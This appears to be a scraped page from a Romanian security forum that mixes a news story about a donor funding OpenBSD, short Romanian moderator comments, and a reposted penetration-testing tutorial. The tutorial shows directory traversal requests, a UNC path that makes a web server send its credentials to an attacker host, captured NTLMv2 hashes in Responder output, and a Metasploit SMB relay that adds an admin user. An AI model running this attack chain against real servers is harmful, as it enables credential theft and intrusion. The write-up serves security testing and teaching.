malsploit

A mysterious Bitcoin-powered white knight is reported to have come to the rescue of the struggling OpenBSD Foundation. Described as a Romanian billionaire, an individual named Mircea Popescu has offered to bail out the OpenBSD Foundation. The Foundation responsible for maintaining OpenBSD is $20,000 in the red over an electricity bill for powering the servers which host the operating system. As yet, Popescu does not feature on the OpenBSD list of “significant” Foundation sponsors. In an IRC session on January 19 Popescu had asked how to make a donation. On a #Bitcoin-assets IRC here, he made a comment that’s been taken as read that he had donated. “And it pleases me to announce openbsd got itself sponsored,” he wrote. Last week the OpenBSD Foundation said it would close down unless it received money to pay off their server ‘leccy bill. The group also asked for somebody to take permanent responsibility for picking up the tab. “OpenBSD will shut down if we do not have the funding to keep the lights on,” OpenBSD developer Bob Beck said in an email to OpenBSD followers on January 14. “We are looking at a significant shortfall for the upcoming year – meaning the project won’t be able to cover 20 thousand dollars in electrical expenses before being able to use money for other things. That sort of situation is not sustainable,” Beck wrote. OpenBSD is important because it’s widely used in firewalls, other edge servers, email, DNS and intrusion detection servers for its security. It’s also included in a number of popular third-party packages that include SQL Lite, BIND, Sendmail and the Lynx web browser. ® Romanian Bitcoin baron 'stumps up $20k to keep OpenBSD's lights on' • The Register https://twitter.com/Mircea_Popescu

So, you have an IPS… And an AV…(II) - Infosec Reactions //hate.me submitted this

Nu se poate. Incearca sa gasesti puncte vulnerabile la user, nu la aplicatie. Incearca sa iei acces la computer. Accesul nu trebuie sa fie neaparat fizic.

Nu se fac din astea pe rst. Respecta-ne putin! //nu e vorba de metin. Daca vrei sa imparti ceva cu rst, trebuie sa o faci cum trebuie. Daca faceai o competitie cu indicii, gen ctf, nu ziceam nimic. Nu poti sa arunci un url si sa astepti sa iti gaseasca cineva un folder. Puteai sa lasi ceva instructiuni in sursa, de exemplu.

Nu era un compliment. Ma refeream la limbajul asta de lemn. E oarecum adevarat ce spui tu acolo, dar suna...

Vorbesti ca un profesor de informatica

Am primit si eu cu marius. Am primit si cu paul si cu alex: "paul/alex iti place ce mi-am cumparat"

Este vorba despre un url shortener si un serviciu de traffic exchange.

Daca e o tentativa de SE primesti cartonas rosu

http://thecodinglove.com/post/60191739460/when-i-put-my-code-in-production-and-it-fails

Sunt adresele de contact de la creatorii librariiilor folosite.

e dimineata? Se plange ca voyo sterge serialele pentru care fata respectiva, verisoara, a platit ca sa le vizioneze.

Se pune spatiu dupa virgula, nu inaintea ei Sunt interese uriase la mijloc. Se fac dezinformari, sunt create stiri false care sunt "inghitite" de mass-media. Mass-media, uneori inconstient, se lasa manipulata de "marile puteri". E ca un magician care cu o mana iti arata asistenta imbracata in costumde baie. Daca te uiti la ea, te-a pacalit. Înscenarea (1997) - IMDb

For some reason I've recently run into a number of web applications that allow for either directory traversal or filename manipulation attacks. These issues are typically used to expose web server specific files and sensitive information files (web.config, salaryreport.pdf, etc.) and/or operating system files (SYSTEM, SAM, etc.) Here's what a typical vulnerable request looks like: GET /Print/FileReader.aspx?Id=report1.pdf&Type=pdf HTTP/1.1 Host: example.com Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; ;Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR ;3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf; Note the Id parameter in the URL. This is the vulnerable parameter that we will be attacking. We could easily change report1.pdf to any other file in the web directory (report2.pdf, web.config, etc.), but we can also turn our attack against the operating system. Here's an example request for the win.ini file from the web server: GET /Print/FileReader.aspx?Id=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini&Type=pdf HTTP/1.1 Host: example.com Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; ;Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR ;3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf; This is a more traditional directory traversal attack. We're moving up several directories so that we can go back into the Windows directory. Directory traversal attacks have been around for a long time, so this may be a pretty familiar concept. Now that we have the basic concepts out of the way, let's see how we can leverage it against internally deployed web applications. Internally deployed web applications can allow for a much wider attack area (RDP, SMB, etc.) against the web server. This also makes directory traversal and file specification attacks more interesting. Instead of just accessing arbitrary files on the system, why don't we try and access other systems in the environment. In order to pivot this attack to other systems on the network, we will be utilizing UNC file paths to capture and/or relay SMB credentials. As a point of clarification, the following examples are against web servers that are running on Windows. Following our previous examples, we will be using a UNC path to our attacking host, instead of report1.pdf for the parameter. Here's an example request: GET /Print/FileReader.aspx?Id=\\192.168.1.123\test.pdf&Type=pdf HTTP/1.1 Host: example.com Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; ;Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR ;3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Cookie: ASP.NET_SessionId=ofaj1zdqr40rl2tjtpt3y1lf; This will force the web server to look for test.pdf at 192.168.1.123. This will allow us to capture and crack the network hashes for the account running the web server service. Here's an example of how we would use https://github.com/SpiderLabs/Responder to do the SMB capture: python Responder.py -i eth0 NBT Name Service/LLMNR Answerer 1.0. Please send bugs/comments to: lgaffie@trustwave.com To kill this script hit CRTL-C [+]NBT-NS & LLMNR responder started [+]Loading Responder.conf File.. Global Parameters set: Responder is bound to this interface:eth0 Challenge set is: 1122334455667788 WPAD Proxy Server is:OFF WPAD script loaded:function FindProxyForURL(url, host){return 'PROXY ISAProxySrv:3141; DIRECT';} HTTP Server is:ON HTTPS Server is:ON SMB Server is:ON SMB LM support is set to:OFF SQL Server is:ON FTP Server is:ON DNS Server is:ON LDAP Server is:ON FingerPrint Module is:OFF Serving Executable via HTTP&WPAD is:OFF Always Serving a Specific File via HTTP&WPAD is:OFF [+]SMB-NTLMv2 hash captured from : ;192.168.1.122 Domain is : EXAMPLE User is : webserverservice [+]SMB complete hash is : webserverservice::EXAMPLE:1122334455667788: 58D4DB26036DE56CB49237BFB9E418F8:01010000000000002A5FB1391FFCCE010F06DF8E6FE85EB20000000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E006C006F00630061006C000500160073006D006200310032002E006C006F00630061006C000800300030000000000000000000000000300000620DD0B514EA55632219A4B83D1D6AAA07659ABA3A4BB54577C7AEEB871A88B90A001000000000000000000000000000000000000900260063006900660073002F00310030002E003100300030002E003100300030002E003100330036000000000000000000 Share requested: \\192.168.1.123\IPC$ [+]SMB-NTLMv2 hash captured from : ;192.168.1.122 Domain is : EXAMPLE User is : webserverservice [+]SMB complete hash is : webserverservice::EXAMPLE:1122334455667788: 57A39519B09AA3F4B6EE7B385CFB624C:01010000000000001A98853A1FFCCE0166E7A590D6DF976B0000000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E006C006F00630061006C000500160073006D006200310032002E006C006F00630061006C000800300030000000000000000000000000300000620DD0B514EA55632219A4B83D1D6AAA07659ABA3A4BB54577C7AEEB871A88B90A001000000000000000000000000000000000000900260063006900660073002F00310030002E003100300030002E003100300030002E003100330036000000000000000000 Share requested: \\192.168.1.123\test.pdf Once we've captured the credentials, we can try to crack them with oclHashcat - advanced password recovery. If the server responds with https://www.netspi.com/blog/entryid/63/automating-halflmchall-hash-cracking, you can use rainbow tables to speed things up. Once cracked, we can see where these credentials have access. Let's pretend that we are not able to crack the hash for the web server account. We can also try to relay these credentials to another host on the internal network (192.168.1.124) that the account may have access to. This can be done with the CVE-2008-4037 Microsoft Windows SMB Relay Code Execution | Rapid7 within Metasploit and Responder recently added support for SMB relay. In the example below, we will use the Metasploit module to add a local user to the target server (192.168.1.124). The typical usage/payload for the module is to get a Meterpreter shell on the target system. Module options (exploit/windows/smb/smb_relay): Name ; ; ; ;Current Setting ;Required ;Description ---- ; ; ; ;--------------- ;-------- ;----------- SHARE ; ; ; ADMIN$ ; ; ; ; ; yes ; ; ; The share to connect to SMBHOST ; ; 192.168.1.124 ; ;no ; ; ; ;The target SMB server SRVHOST ; ; 192.168.1.123 ; ;yes ; ; ; The local host to listen on. SRVPORT ; ; 445 ; ; ; ; ; ; ;yes ; ; ; The local port to listen on. SSL ; ; ; ; false ; ; ; ; ; ;no ; ; ; ;Negotiate SSL for incoming connections SSLCert ; ; ; ; ; ; ; ; ; ; ;no ; ; ; ;Path to a custom SSL certificate SSLVersion ;SSL3 ; ; ; ; ; ; no ; ; ; ;Specify the version of SSL that should be used Payload options (windows/adduser): Name ; ; ;Current Setting ;Required ;Description ---- ; ; ;--------------- ;-------- ;----------- CUSTOM ; ; ; ; ; ; ; ; ; ; no ; ; ; ;Custom group name to be used instead of default EXITFUNC ;thread ; ; ; ; ; yes ; ; ; Exit technique: seh, thread, process, none PASS ; ; ;Password123! ; ; yes ; ; ; The password for this user USER ; ; ;netspi ; ; ; ; ; yes ; ; ; The username to create WMIC ; ; ;false ; ; ; ; ; ;yes ; ; ; Use WMIC on the target to resolve administrators group Exploit running as background job. Server started. <------------Truncated------------> Received 192.168.1.122:21251 EXAMPLE\webserverservice LMHASH:b2--Truncated--03 NTHASH:46-- Truncated --00 OS: LM: Authenticating to 192.168.1.124 as EXAMPLE\webserverservice... AUTHENTICATED as EXAMPLE\webserverservice... Connecting to the defined share... Regenerating the payload... Uploading payload... Created \OemWSPRa.exe... Connecting to the Service Control Manager... Obtaining a service manager handle... Creating a new service... Closing service handle... Opening service... Starting the service... Removing the service... Closing service handle... Deleting \OemWSPRa.exe... Sending Access Denied to 192.168.1.122:21251 EXAMPLE\webserverservice https://www.netspi.com/blog/entryid/213/smb-attacks-through-directory-traversal

Un cazinou online poate manipula rezultatele dupa cum doreste. Eu am jucat la ruleta pe bet365 si erau cazuri in care aveam si 10 maini consecutive nefavorabile, indiferent de strategie. Chiar daca functioneaza, nu o sa ai niciodata bani suficienti pentru acoperire.

Asa atragi tu atentia ca e vechi thread-ul?:

Abtineti-va de la astfel de posturi. Nu intereseaza pe nimeni ca o sa il incercati sau ca l-ati incercat. Oferiti feedback de calitate ca sa motivati creatorul programului. In cazul in care gasiti bug-uri sau aveti sugestii, sunteti liberi sa postati.

Sper ca incerci sa prostesti pe cineva. In cazul in care esti inregistrat din 2007 pe rst si mai crezi in povestile astea, e destul de grav.

Il inchidem ca iar se spameaza indexul.

Aici nu e hi5! Ai putin respect pentru persoanele din staff! Puteai sa-i trimiti un mesaj privat.

Tu nu ai nevoie de ajutor. Tu ai nevoie de informatii elementare in domeniu, pe care trebuie sa le gasesti singur, asa cum am facut si noi. Inchidem, avertizam, mutam la cos.

https://www.facebook.com/photo.php?v=383921101747624

Zatarra scuze ca iti stric afacerea Il inchidem si il mutam la cos.